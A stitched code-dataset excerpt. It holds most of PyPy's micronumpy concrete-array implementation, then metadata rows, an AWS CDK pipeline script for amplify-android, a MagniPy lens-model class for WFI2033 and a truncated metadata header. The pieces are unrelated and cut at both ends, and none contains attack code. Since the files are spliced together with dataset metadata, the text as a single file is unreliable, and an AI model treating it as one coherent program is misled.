calculate_broadcast_strides, calc_backstrides, calc_start, is_c_contiguous,
is_f_contiguous)
from rpython.rlib.objectmodel import keepalive_until_here
TimSort = make_timsort_class()
class StrideSort(TimSort):
'''
argsort (return the indices to sort) a list of strides
'''
def __init__(self, rangelist, strides, order):
self.strides = strides
self.order = order
TimSort.__init__(self, rangelist)
def lt(self, a, b):
if self.order == NPY.CORDER:
return self.strides[a] <= self.strides[b]
return self.strides[a] < self.strides[b]
class BaseConcreteArray(object):
_immutable_fields_ = ['dtype?', 'storage', 'start', 'size', 'shape[*]',
'strides[*]', 'backstrides[*]', 'order', 'gcstruct',
'flags']
start = 0
parent = None
flags = 0
# JIT hints that length of all those arrays is a constant
def get_shape(self):
shape = self.shape
jit.hint(len(shape), promote=True)
return shape
def get_strides(self):
strides = self.strides
jit.hint(len(strides), promote=True)
return strides
def get_backstrides(self):
backstrides = self.backstrides
jit.hint(len(backstrides), promote=True)
return backstrides
def get_flags(self):
return self.flags
def getitem(self, index):
return self.dtype.read(self, index, 0)
def getitem_bool(self, index):
return self.dtype.read_bool(self, index, 0)
def setitem(self, index, value):
self.dtype.store(self, index, 0, value)
@jit.unroll_safe
def setslice(self, space, arr):
if arr.get_size() == 1:
# we can always set self[:] = scalar
pass
elif len(arr.get_shape()) > len(self.get_shape()):
# record arrays get one extra dimension
if not self.dtype.is_record() or \
len(arr.get_shape()) > len(self.get_shape()) + 1:
raise oefmt(space.w_ValueError,
"could not broadcast input array from shape "
"(%s) into shape (%s)",
','.join([str(x) for x in arr.get_shape()]),
','.join([str(x) for x in self.get_shape()]),
)
shape = shape_agreement(space, self.get_shape(), arr)
impl = arr.implementation
if impl.storage == self.storage:
impl = impl.copy(space)
loop.setslice(space, shape, self, impl)
def get_size(self):
return self.size // self.dtype.elsize
def get_storage_size(self):
return self.size
def reshape(self, orig_array, new_shape, order=NPY.ANYORDER):
# Since we got to here, prod(new_shape) == self.size
order = support.get_order_as_CF(self.order, order)
new_strides = None
if self.size == 0:
new_strides, _ = calc_strides(new_shape, self.dtype, order)
else:
if len(self.get_shape()) == 0:
new_strides = [self.dtype.elsize] * len(new_shape)
else:
new_strides = calc_new_strides(new_shape, self.get_shape(),
self.get_strides(), order)
if new_strides is None or len(new_strides) != len(new_shape):
return None
if new_strides is not None:
# We can create a view, strides somehow match up.
new_backstrides = calc_backstrides(new_strides, new_shape)
assert isinstance(orig_array, W_NDimArray) or orig_array is None
return SliceArray(self.start, new_strides, new_backstrides,
new_shape, self, orig_array)
return None
def get_view(self, space, orig_array, dtype, new_shape, strides=None, backstrides=None):
if not strides:
strides, backstrides = calc_strides(new_shape, dtype,
self.order)
return SliceArray(self.start, strides, backstrides, new_shape,
self, orig_array, dtype=dtype)
def get_real(self, space, orig_array):
strides = self.get_strides()
backstrides = self.get_backstrides()
if self.dtype.is_complex():
dtype = self.dtype.get_float_dtype(space)
return SliceArray(self.start, strides, backstrides,
self.get_shape(), self, orig_array, dtype=dtype)
return SliceArray(self.start, strides, backstrides,
self.get_shape(), self, orig_array)
def set_real(self, space, orig_array, w_value):
tmp = self.get_real(space, orig_array)
tmp.setslice(space, convert_to_array(space, w_value))
def get_imag(self, space, orig_array):
strides = self.get_strides()
backstrides = self.get_backstrides()
if self.dtype.is_complex():
dtype = self.dtype.get_float_dtype(space)
return SliceArray(self.start + dtype.elsize, strides, backstrides,
self.get_shape(), self, orig_array, dtype=dtype)
impl = NonWritableArray(self.get_shape(), self.dtype, self.order,
strides, backstrides)
if not self.dtype.is_flexible():
impl.fill(space, self.dtype.box(0))
return impl
def set_imag(self, space, orig_array, w_value):
tmp = self.get_imag(space, orig_array)
tmp.setslice(space, convert_to_array(space, w_value))
# -------------------- applevel get/setitem -----------------------
@jit.unroll_safe
def _lookup_by_index(self, space, view_w):
item = self.start
strides = self.get_strides()
for i, w_index in enumerate(view_w):
if space.isinstance_w(w_index, space.w_slice):
raise IndexError
idx = support.index_w(space, w_index)
if idx < 0:
idx = self.get_shape()[i] + idx
if idx < 0 or idx >= self.get_shape()[i]:
raise oefmt(space.w_IndexError,
"index %d is out of bounds for axis %d with size "
"%d", idx, i, self.get_shape()[i])
item += idx * strides[i]
return item
@jit.unroll_safe
def _lookup_by_unwrapped_index(self, space, lst):
item = self.start
shape = self.get_shape()
strides = self.get_strides()
assert len(lst) == len(shape)
for i, idx in enumerate(lst):
if idx < 0:
idx = shape[i] + idx
if idx < 0 or idx >= shape[i]:
raise oefmt(space.w_IndexError,
"index %d is out of bounds for axis %d with size "
"%d", idx, i, self.get_shape()[i])
item += idx * strides[i]
return item
def getitem_index(self, space, index):
return self.getitem(self._lookup_by_unwrapped_index(space, index))
def setitem_index(self, space, index, value):
self.setitem(self._lookup_by_unwrapped_index(space, index), value)
@jit.unroll_safe
def _single_item_index(self, space, w_idx):
""" Return an index of single item if possible, otherwise raises
IndexError
"""
if (space.isinstance_w(w_idx, space.w_text) or
space.isinstance_w(w_idx, space.w_slice) or
space.is_w(w_idx, space.w_None)):
raise IndexError
if isinstance(w_idx, W_NDimArray) and not w_idx.is_scalar():
raise ArrayArgumentException
shape = self.get_shape()
shape_len = len(shape)
view_w = None
if space.isinstance_w(w_idx, space.w_list):
raise ArrayArgumentException
if space.isinstance_w(w_idx, space.w_tuple):
view_w = space.fixedview(w_idx)
if len(view_w) != shape_len:
raise IndexError
# check for arrays
for w_item in view_w:
if (isinstance(w_item, W_NDimArray) or
space.isinstance_w(w_item, space.w_list)):
raise ArrayArgumentException
elif space.is_w(w_item, space.w_Ellipsis):
raise IndexError
return self._lookup_by_index(space, view_w)
if shape_len == 0:
raise oefmt(space.w_IndexError, "too many indices for array")
elif shape_len > 1:
raise IndexError
idx = support.index_w(space, w_idx)
return self._lookup_by_index(space, [space.newint(idx)])
@jit.unroll_safe
def _prepare_slice_args(self, space, w_idx):
from pypy.module.micronumpy import boxes
if space.isinstance_w(w_idx, space.w_text):
raise oefmt(space.w_IndexError, "only integers, slices (`:`), "
"ellipsis (`...`), numpy.newaxis (`None`) and integer or "
"boolean arrays are valid indices")
if space.isinstance_w(w_idx, space.w_slice):
if len(self.get_shape()) == 0:
raise oefmt(space.w_ValueError, "cannot slice a 0-d array")
return [SliceChunk(w_idx), EllipsisChunk()]
elif space.isinstance_w(w_idx, space.w_int):
return [IntegerChunk(w_idx), EllipsisChunk()]
elif isinstance(w_idx, W_NDimArray) and w_idx.is_scalar():
w_idx = w_idx.get_scalar_value().item(space)
if not space.isinstance_w(w_idx, space.w_int) and \
not space.isinstance_w(w_idx, space.w_bool):
raise oefmt(space.w_IndexError,
"arrays used as indices must be of integer (or "
"boolean) type")
return [IntegerChunk(w_idx), EllipsisChunk()]
elif space.is_w(w_idx, space.w_None):
return [NewAxisChunk(), EllipsisChunk()]
result = []
has_ellipsis = False
has_filter = False
for w_item in space.fixedview(w_idx):
if space.is_w(w_item, space.w_Ellipsis):
if has_ellipsis:
# in CNumPy, this is only a deprecation warning
raise oefmt(space.w_ValueError,
"an index can only have a single Ellipsis (`...`); "
"replace all but one with slices (`:`).")
result.append(EllipsisChunk())
has_ellipsis = True
elif space.is_w(w_item, space.w_None):
result.append(NewAxisChunk())
elif space.isinstance_w(w_item, space.w_slice):
result.append(SliceChunk(w_item))
elif isinstance(w_item, W_NDimArray) and w_item.get_dtype().is_bool():
if has_filter:
# in CNumPy, the support for this is incomplete
raise oefmt(space.w_ValueError,
"an index can only have a single boolean mask; "
"use np.take or create a sinlge mask array")
has_filter = True
result.append(BooleanChunk(w_item))
elif isinstance(w_item, boxes.W_GenericBox):
result.append(IntegerChunk(w_item.descr_int(space)))
else:
result.append(IntegerChunk(w_item))
if not has_ellipsis:
result.append(EllipsisChunk())
return result
def descr_getitem(self, space, orig_arr, w_index):
try:
item = self._single_item_index(space, w_index)
return self.getitem(item)
except IndexError:
# not a single result
chunks = self._prepare_slice_args(space, w_index)
copy = False
if isinstance(chunks[0], BooleanChunk):
# numpy compatibility
copy = True
w_ret = new_view(space, orig_arr, chunks)
if copy:
w_ret = w_ret.descr_copy(space, space.newint(w_ret.get_order()))
return w_ret
def descr_setitem(self, space, orig_arr, w_index, w_value):
try:
item = self._single_item_index(space, w_index)
self.setitem(item, self.dtype.coerce(space, w_value))
except IndexError:
w_value = convert_to_array(space, w_value)
chunks = self._prepare_slice_args(space, w_index)
view = new_view(space, orig_arr, chunks)
view.implementation.setslice(space, w_value)
def transpose(self, orig_array, axes=None):
if len(self.get_shape()) < 2:
return self
strides = []
backstrides = []
shape = []
if axes is None:
axes = range(len(self.get_shape()) - 1, -1, -1)
for i in axes:
strides.append(self.get_strides()[i])
backstrides.append(self.get_backstrides()[i])
shape.append(self.get_shape()[i])
return SliceArray(self.start, strides,
backstrides, shape, self, orig_array)
def copy(self, space, order=NPY.ANYORDER):
if order == NPY.ANYORDER:
order = NPY.KEEPORDER
return self.astype(space, self.dtype, order, copy=True)
def create_iter(self, shape=None, backward_broadcast=False):
if shape is not None and \
support.product(shape) > support.product(self.get_shape()):
r = calculate_broadcast_strides(self.get_strides(),
self.get_backstrides(),
self.get_shape(), shape,
backward_broadcast)
i = ArrayIter(self, support.product(shape), shape, r[0], r[1])
else:
i = ArrayIter(self, self.get_size(), self.shape,
self.strides, self.backstrides)
return i, i.reset()
def swapaxes(self, space, orig_arr, axis1, axis2):
shape = self.get_shape()[:]
strides = self.get_strides()[:]
backstrides = self.get_backstrides()[:]
shape[axis1], shape[axis2] = shape[axis2], shape[axis1]
strides[axis1], strides[axis2] = strides[axis2], strides[axis1]
backstrides[axis1], backstrides[axis2] = backstrides[axis2], backstrides[axis1]
return W_NDimArray.new_slice(space, self.start, strides,
backstrides, shape, self, orig_arr)
def nonzero(self, space, index_type):
s = loop.count_all_true_concrete(self)
box = index_type.itemtype.box
nd = len(self.get_shape()) or 1
w_res = W_NDimArray.from_shape(space, [s, nd], index_type)
loop.nonzero(w_res, self, box)
w_res = w_res.implementation.swapaxes(space, w_res, 0, 1)
l_w = [w_res.descr_getitem(space, space.newint(d)) for d in range(nd)]
return space.newtuple(l_w)
##def get_storage(self):
## return self.storage
## use a safer context manager
def __enter__(self):
return self.storage
def __exit__(self, typ, value, traceback):
keepalive_until_here(self)
def get_buffer(self, space, flags):
errtype = space.w_ValueError # should be BufferError, numpy does this instead
if ((flags & space.BUF_C_CONTIGUOUS) == space.BUF_C_CONTIGUOUS and
not self.flags & NPY.ARRAY_C_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not C-contiguous")
if ((flags & space.BUF_F_CONTIGUOUS) == space.BUF_F_CONTIGUOUS and
not self.flags & NPY.ARRAY_F_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not Fortran contiguous")
if ((flags & space.BUF_ANY_CONTIGUOUS) == space.BUF_ANY_CONTIGUOUS and
not (self.flags & NPY.ARRAY_F_CONTIGUOUS and
self.flags & NPY.ARRAY_C_CONTIGUOUS)):
raise oefmt(errtype, "ndarray is not contiguous")
if ((flags & space.BUF_STRIDES) != space.BUF_STRIDES and
not self.flags & NPY.ARRAY_C_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not C-contiguous")
if ((flags & space.BUF_WRITABLE) == space.BUF_WRITABLE and
not self.flags & NPY.ARRAY_WRITEABLE):
raise oefmt(errtype, "buffer source array is read-only")
readonly = not (flags & space.BUF_WRITABLE) == space.BUF_WRITABLE
return ArrayBuffer(self, readonly)
def astype(self, space, dtype, order, copy=True):
# copy the general pattern of the strides
# but make the array storage contiguous in memory
shape = self.get_shape()
strides = self.get_strides()
if order not in (NPY.KEEPORDER, NPY.FORTRANORDER, NPY.CORDER):
raise oefmt(space.w_ValueError, "Unknown order %d in astype", order)
if len(strides) == 0:
t_strides = []
backstrides = []
elif order in (NPY.FORTRANORDER, NPY.CORDER):
t_strides, backstrides = calc_strides(shape, dtype, order)
else:
indx_array = range(len(strides))
list_sorter = StrideSort(indx_array, strides, self.order)
list_sorter.sort()
t_elsize = dtype.elsize
t_strides = strides[:]
base = dtype.elsize
for i in indx_array:
t_strides[i] = base
base *= shape[i]
backstrides = calc_backstrides(t_strides, shape)
order = support.get_order_as_CF(self.order, order)
impl = ConcreteArray(shape, dtype, order, t_strides, backstrides)
if copy:
loop.setslice(space, impl.get_shape(), impl, self)
return impl
OBJECTSTORE = lltype.GcStruct('ObjectStore',
('length', lltype.Signed),
('step', lltype.Signed),
('storage', llmemory.Address),
rtti=True)
offset_of_storage = llmemory.offsetof(OBJECTSTORE, 'storage')
offset_of_length = llmemory.offsetof(OBJECTSTORE, 'length')
offset_of_step = llmemory.offsetof(OBJECTSTORE, 'step')
V_OBJECTSTORE = lltype.nullptr(OBJECTSTORE)
def customtrace(gc, obj, callback, arg):
#debug_print('in customtrace w/obj', obj)
length = (obj + offset_of_length).signed[0]
step = (obj + offset_of_step).signed[0]
storage = (obj + offset_of_storage).address[0]
#debug_print('tracing', length, 'objects in ndarray.storage')
i = 0
while i < length:
gc._trace_callback(callback, arg, storage)
storage += step
i += 1
lambda_customtrace = lambda: customtrace
def _setup():
rgc.register_custom_trace_hook(OBJECTSTORE, lambda_customtrace)
@jit.dont_look_inside
def _create_objectstore(storage, length, elsize):
gcstruct = lltype.malloc(OBJECTSTORE)
# JIT does not support cast_ptr_to_adr
gcstruct.storage = llmemory.cast_ptr_to_adr(storage)
#print 'create gcstruct',gcstruct,'with storage',storage,'as',gcstruct.storage
gcstruct.length = length
gcstruct.step = elsize
return gcstruct
class ConcreteArrayNotOwning(BaseConcreteArray):
def __init__(self, shape, dtype, order, strides, backstrides, storage, start=0):
make_sure_not_resized(shape)
make_sure_not_resized(strides)
make_sure_not_resized(backstrides)
self.shape = shape
# already tested for overflow in from_shape_and_storage
self.size = support.product(shape) * dtype.elsize
if order not in (NPY.CORDER, NPY.FORTRANORDER):
raise oefmt(dtype.itemtype.space.w_ValueError, "ConcreteArrayNotOwning but order is not 0,1 rather %d", order)
self.order = order
self.dtype = dtype
self.strides = strides
self.backstrides = backstrides
self.storage = storage
self.start = start
self.gcstruct = V_OBJECTSTORE
def fill(self, space, box):
self.dtype.itemtype.fill(
self.storage, self.dtype.elsize, self.dtype.is_native(),
box, 0, self.size, 0, self.gcstruct)
def set_shape(self, space, orig_array, new_shape):
if len(new_shape) > NPY.MAXDIMS:
raise oefmt(space.w_ValueError,
"sequence too large; cannot be greater than %d", NPY.MAXDIMS)
try:
ovfcheck(support.product_check(new_shape) * self.dtype.elsize)
except OverflowError as e:
raise oefmt(space.w_ValueError, "array is too big.")
strides, backstrides = calc_strides(new_shape, self.dtype,
self.order)
return SliceArray(self.start, strides, backstrides, new_shape, self,
orig_array)
def set_dtype(self, space, dtype):
# size/shape/strides shouldn't change
assert dtype.elsize == self.dtype.elsize
self.dtype = dtype
def argsort(self, space, w_axis):
from .selection import argsort_array
return argsort_array(self, space, w_axis)
def sort(self, space, w_axis, w_order):
from .selection import sort_array
return sort_array(self, space, w_axis, w_order)
def base(self):
return None
class ConcreteArray(ConcreteArrayNotOwning):
def __init__(self, shape, dtype, order, strides, backstrides,
storage=lltype.nullptr(RAW_STORAGE), zero=True):
gcstruct = V_OBJECTSTORE
flags = NPY.ARRAY_ALIGNED | NPY.ARRAY_WRITEABLE
try:
length = support.product_check(shape)
self.size = ovfcheck(length * dtype.elsize)
except OverflowError:
raise oefmt(dtype.itemtype.space.w_ValueError, "array is too big.")
if storage == lltype.nullptr(RAW_STORAGE):
if dtype.num == NPY.OBJECT:
storage = dtype.itemtype.malloc(length * dtype.elsize, zero=True)
gcstruct = _create_objectstore(storage, length, dtype.elsize)
else:
storage = dtype.itemtype.malloc(length * dtype.elsize, zero=zero)
flags |= NPY.ARRAY_OWNDATA
start = calc_start(shape, strides)
ConcreteArrayNotOwning.__init__(self, shape, dtype, order, strides, backstrides,
storage, start=start)
self.gcstruct = gcstruct
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def __del__(self):
if self.gcstruct:
self.gcstruct.length = 0
free_raw_storage(self.storage, track_allocation=False)
class ConcreteArrayWithBase(ConcreteArrayNotOwning):
def __init__(self, shape, dtype, order, strides, backstrides, storage,
orig_base, start=0):
ConcreteArrayNotOwning.__init__(self, shape, dtype, order,
strides, backstrides, storage, start)
self.orig_base = orig_base
if isinstance(orig_base, W_NumpyObject):
flags = orig_base.get_flags() & NPY.ARRAY_ALIGNED
flags |= orig_base.get_flags() & NPY.ARRAY_WRITEABLE
else:
flags = 0
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def base(self):
return self.orig_base
class ConcreteNonWritableArrayWithBase(ConcreteArrayWithBase):
def __init__(self, shape, dtype, order, strides, backstrides, storage,
orig_base, start=0):
ConcreteArrayWithBase.__init__(self, shape, dtype, order, strides,
backstrides, storage, orig_base, start)
self.flags &= ~ NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class NonWritableArray(ConcreteArray):
def __init__(self, shape, dtype, order, strides, backstrides,
storage=lltype.nullptr(RAW_STORAGE), zero=True):
ConcreteArray.__init__(self, shape, dtype, order, strides, backstrides,
storage, zero)
self.flags &= ~ NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class SliceArray(BaseConcreteArray):
def __init__(self, start, strides, backstrides, shape, parent, orig_arr,
dtype=None):
self.strides = strides
self.backstrides = backstrides
self.shape = shape
if dtype is None:
dtype = parent.dtype
if isinstance(parent, SliceArray):
parent = parent.parent # one level only
self.parent = parent
self.storage = parent.storage
self.gcstruct = parent.gcstruct
if parent.order not in (NPY.CORDER, NPY.FORTRANORDER):
raise oefmt(dtype.itemtype.space.w_ValueError, "SliceArray but parent order is not 0,1 rather %d", parent.order)
self.order = parent.order
self.dtype = dtype
try:
self.size = ovfcheck(support.product_check(shape) * self.dtype.elsize)
except OverflowError:
raise oefmt(dtype.itemtype.space.w_ValueError, "array is too big.")
self.start = start
self.orig_arr = orig_arr
flags = parent.flags & NPY.ARRAY_ALIGNED
flags |= parent.flags & NPY.ARRAY_WRITEABLE
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def base(self):
return self.orig_arr
def fill(self, space, box):
loop.fill(self, box.convert_to(space, self.dtype))
def set_shape(self, space, orig_array, new_shape):
if len(new_shape) > NPY.MAXDIMS:
raise oefmt(space.w_ValueError,
"sequence too large; cannot be greater than %d", NPY.MAXDIMS)
try:
ovfcheck(support.product_check(new_shape) * self.dtype.elsize)
except OverflowError as e:
raise oefmt(space.w_ValueError, "array is too big.")
if len(self.get_shape()) < 2 or self.size == 0:
# TODO: this code could be refactored into calc_strides
# but then calc_strides would have to accept a stepping factor
strides = []
backstrides = []
dtype = self.dtype
try:
s = self.get_strides()[0] // dtype.elsize
except IndexError:
s = 1
if self.order != NPY.FORTRANORDER:
new_shape.reverse()
for sh in new_shape:
strides.append(s * dtype.elsize)
backstrides.append(s * (sh - 1) * dtype.elsize)
s *= max(1, sh)
if self.order != NPY.FORTRANORDER:
strides.reverse()
backstrides.reverse()
new_shape.reverse()
return self.__class__(self.start, strides, backstrides, new_shape,
self, orig_array)
new_strides = calc_new_strides(new_shape, self.get_shape(),
self.get_strides(),
self.order)
if new_strides is None or len(new_strides) != len(new_shape):
raise oefmt(space.w_AttributeError,
"incompatible shape for a non-contiguous array")
new_backstrides = [0] * len(new_shape)
for nd in range(len(new_shape)):
new_backstrides[nd] = (new_shape[nd] - 1) * new_strides[nd]
return self.__class__(self.start, new_strides, new_backstrides, new_shape,
self, orig_array)
def sort(self, space, w_axis, w_order):
from .selection import sort_array
return sort_array(self, space, w_axis, w_order)
class NonWritableSliceArray(SliceArray):
def __init__(self, start, strides, backstrides, shape, parent, orig_arr,
dtype=None):
SliceArray.__init__(self, start, strides, backstrides, shape, parent,
orig_arr, dtype)
self.flags &= ~NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class VoidBoxStorage(BaseConcreteArray):
def __init__(self, size, dtype):
self.storage = alloc_raw_storage(size)
self.gcstruct = V_OBJECTSTORE
self.dtype = dtype
self.size = size
self.flags = (NPY.ARRAY_C_CONTIGUOUS | NPY.ARRAY_F_CONTIGUOUS |
NPY.ARRAY_WRITEABLE | NPY.ARRAY_ALIGNED)
def __del__(self):
free_raw_storage(self.storage)
class ArrayBuffer(Buffer):
_immutable_ = True
def __init__(self, impl, readonly):
self.impl = impl
self.readonly = readonly
def getitem(self, index):
return raw_storage_getitem(lltype.Char, self.impl.storage,
index + self.impl.start)
def setitem(self, index, v):
# XXX what if self.readonly?
raw_storage_setitem(self.impl.storage, index + self.impl.start,
rffi.cast(lltype.Char, v))
def getlength(self):
return self.impl.size - self.impl.start
def get_raw_address(self):
from rpython.rtyper.lltypesystem import rffi
return rffi.ptradd(self.impl.storage, self.impl.start)
def getformat(self):
sb = StringBuilder()
self.impl.dtype.getformat(sb)
return sb.build()
def getitemsize(self):
return self.impl.dtype.elsize
def getndim(self):
return len(self.impl.shape)
def getshape(self):
return self.impl.shape
def getstrides(self):
return self.impl.strides
| 41.453083
| 124
| 0.603835
|
9b2660421489a2dcf90a9f11b247b832641c0bb9
| 2,224
|
py
|
Python
|
src/build_infrastructure/android/app.py
|
ammarkarachi/amplify-ci-support
|
f3ebefa2e64eba64b7bb05aad51e1e91f0c74112
|
[
"Apache-2.0"
] | 1
|
2021-07-07T10:50:45.000Z
|
2021-07-07T10:50:45.000Z
|
src/build_infrastructure/android/app.py
|
yuth/amplify-ci-support
|
eab10558f1880bf9565dfa1aaf50d47de48de667
|
[
"Apache-2.0"
] | null | null | null |
src/build_infrastructure/android/app.py
|
yuth/amplify-ci-support
|
eab10558f1880bf9565dfa1aaf50d47de48de667
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import os
from aws_cdk import (
core,
aws_codepipeline_actions
)
from stacks.build_pipeline_stack import AmplifyAndroidCodePipeline
from stacks.account_bootstrap_stack import AccountBootstrap
from stacks.maven_release_stack import MavenReleaseStack
app = core.App()
TARGET_REGION = app.node.try_get_context("region")
TARGET_ACCOUNT = app.node.try_get_context("account")
TARGET_ENV=core.Environment( account=TARGET_ACCOUNT, region=TARGET_REGION)
REPO='amplify-android'
github_owner=app.node.try_get_context("github_owner")
branch=app.node.try_get_context("branch")
config_source_bucket = app.node.try_get_context("config_source_bucket")
release_pr_branch = app.node.try_get_context("release_pr_branch")
log_level=app.node.try_get_context("log_level")
print(f"AWS Account={TARGET_ACCOUNT} Region={TARGET_REGION}")
# Account bootstrap stack
account_bootstrap = AccountBootstrap(app, "AccountBootstrap", {}, env=TARGET_ENV)
# Unit and integration test stack
code_pipeline_stack_props = {
# If set, config files for tests will be copied from S3. Otherwise, it will attempt to retrieve using the Amplify CLI
'config_source_bucket': account_bootstrap.config_source_bucket.bucket_name,
'github_source': {
'owner': github_owner,
'repo': REPO ,
'base_branch': branch
},
'device_farm_project_name': 'AmplifyAndroidDeviceFarmTests',
'codebuild_project_name_prefix': 'AmplifyAndroid'
}
pipeline_stack = AmplifyAndroidCodePipeline(app,
"AndroidBuildPipeline",
code_pipeline_stack_props,
description="CI Pipeline assets for amplify-android",
env=TARGET_ENV)
# Maven publisher stack
maven_publisher_stack_props = {
'github_source': {
'owner': github_owner,
'repo': REPO,
'base_branch': branch,
'release_pr_branch': release_pr_branch
},
'codebuild_project_name_prefix': 'AmplifyAndroid'
}
MavenReleaseStack(app, "MavenPublisher", maven_publisher_stack_props, description="Assets used for publishing amplify-android to maven.", env=TARGET_ENV)
app.synth()
| 34.75
| 153
| 0.724371
|
0d3e7c8f37ed185b15e388634718a6248ca4ce54
| 5,423
|
py
|
Python
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | 2
|
2020-02-20T02:27:16.000Z
|
2020-02-20T08:38:23.000Z
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | 1
|
2021-11-15T17:50:20.000Z
|
2021-11-15T17:50:20.000Z
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | null | null | null |
import numpy as np
from MagniPy.lensdata import Data
from MagniPy.LensBuild.defaults import get_default_SIE_random, get_default_SIE
from MagniPy.util import approx_theta_E
from MagniPy.Workflow.grism_lenses.quad import Quad
class WFI2033_satlocobs(Quad):
x = np.array([-0.751, -0.039, 1.445, -0.668])
y = np.array([0.953, 1.068, -0.307, -0.585])
m = np.array([1., 0.65, 0.5, 0.53])
time_delay_AB, delta_AB = 0, 100
time_delay_AC, delta_AC = -36.2, 0.8
time_delay_AD, delta_AD = 23.3, 1.4
# delta_time_delay = np.array([delta_AB, delta_AC, delta_AD])
# relative_arrival_times = np.array([time_delay_AB, time_delay_AC, time_delay_AD])
relative_arrival_times = np.array([0.01, 36.2, 23.3 + 36.2])
delta_time_delay = np.array([delta_AB, delta_AC, np.sqrt(delta_AC**2 + delta_AD**2)])
sigma_x = np.array([0.005]*4)
sigma_y = np.array([0.005]*4)
sigma_m = np.zeros_like(sigma_x)
zsrc, zlens = 1.66, 0.66
# source redshift from Motta et al
data = Data(x, y, m, None, None,
sigma_x = sigma_x, sigma_y = sigma_y,
sigma_m=sigma_m)
identifier = 'lens2033'
flux_ratio_index = 0
fluximg = ['A', 'B', 'C', 'D'][flux_ratio_index]
_macromodel = get_default_SIE(zlens)
_macromodel.lenstronomy_args['theta_E'] = approx_theta_E(x, y)
gamma_min = 1.9
gamma_max = 2.1
kwargs_lens_init = [{'theta_E': 1.0011161129638548, 'center_x': 0.0035639468432663527,
'center_y': 0.022250277854418788, 'e1': 0.013745407369119727,
'e2': 0.04242065788101877, 'gamma': 1.95},
{'gamma1': 0.1849727326105099, 'gamma2': -0.07557590574285741}]
kwargs_lens_light = [{'amp': 2500, 'R_sersic': 0.2, 'n_sersic': 4., 'center_x': None, 'center_y': None}]
kwargs_source_light = [{'amp': 1000, 'R_sersic': 0.08, 'n_sersic': 2.5, 'center_x': None, 'center_y': None,
'e1': 0.01, 'e2': -0.14}]
srcmin = 0.02
srcmax = 0.05
has_satellite = True
satellite_mass_model = ['SIS', 'SIS']
satellite1_pos_mass = [0.245, 2.037]
satellite2_pos_mass = [-3.965, -0.022]
satellite2_pos_mass_effective = [-3.63, -0.08]
satellite_redshift = [zlens, 0.745]
satellite_convention = ['phys', 'phys']
theta_E = (0.389*0.334)**0.5
kwargs_satellite_light = [{'amp': 800, 'R_sersic': 0.1, 'n_sersic': 3.,
'center_x': satellite1_pos_mass[0],
'center_y': satellite1_pos_mass[1]},
None]
satellite_kwargs = [{'theta_E': 0.03, 'center_x': satellite1_pos_mass[0], 'center_y': satellite1_pos_mass[1]},
{'theta_E': 0.93, 'center_x': satellite2_pos_mass[0],
'center_y': satellite2_pos_mass[1]}]
@staticmethod
def relative_time_delays(arrival_times):
trel = arrival_times[1:] - arrival_times[0]
trel = [abs(trel[0]), abs(trel[1]), abs(trel[1]) + abs(trel[2])]
return np.array(trel)
def optimize_fit(self, kwargs_fit={}, macro_init = None, print_output = False):
if 'datatofit' in kwargs_fit.keys():
data = kwargs_fit['datatofit']
del kwargs_fit['datatofit']
else:
data = self.data
if 'satellites' not in kwargs_fit.keys():
satellites = {}
satellites['lens_model_name'] = self.satellite_mass_model
satellites['z_satellite'] = self.satellite_redshift
satellites['kwargs_satellite'] = self.satellite_kwargs
satellites['position_convention'] = self.satellite_convention
kwargs_fit.update({'satellites': satellites})
optdata, optmodel = self._fit(data, self.solver, kwargs_fit, macromodel_init=macro_init)
if print_output:
self._print_output(optdata[0], optmodel[0])
return optdata[0], optmodel[0]
def optimize_fit_lensmodel(self, kwargs_fit={}, macro_init = None, print_output = False):
kwargs_fit.update({'identifier': self.identifier})
optdata, optmodel = self._fit_lensmodel(self.data, self.solver, kwargs_fit, macromodel_init=macro_init)
if print_output:
self._print_output(optdata[0], optmodel[0])
return optdata[0], optmodel[0]
def _print_output(self, optdata, optmodel):
macromodel = optmodel.lens_components[0]
print('optimized mags: ', optdata.m)
print('observed mags: ', self.data.m)
print('lensmodel fit: ')
print('Einstein radius: ', macromodel.lenstronomy_args['theta_E'])
print('shear, shear_theta:', macromodel.shear, macromodel.shear_theta)
print('ellipticity, PA:', macromodel.ellip_PA_polar()[0], macromodel.ellip_PA_polar()[1])
print('centroid: ', macromodel.lenstronomy_args['center_x'],
macromodel.lenstronomy_args['center_y'])
print('\n')
print('flux ratios w.r.t. image '+str(self.fluximg)+':')
print('observed: ', self.data.compute_flux_ratios(index=self.flux_ratio_index))
print('recovered: ', optdata.compute_flux_ratios(index=self.flux_ratio_index))
# lens = WFI2033()
# x, y = lens.x, lens.y
# col = ['k', 'r', 'm', 'g']
# import matplotlib.pyplot as plt
# for l in range(0, 4):
# plt.scatter(-x[l], y[l], color=col[l])
# plt.show()
| 38.460993
| 114
| 0.619214
|
fbc61746c687428060bb7d3bebd8185288369433
| 8,148
|
py
|
Python
|
contrib/devtools/update-translations.py
|
zero24x/ltx
|
045dd208b875bdf891f1f1a09249beaed6c55b0f
|
[
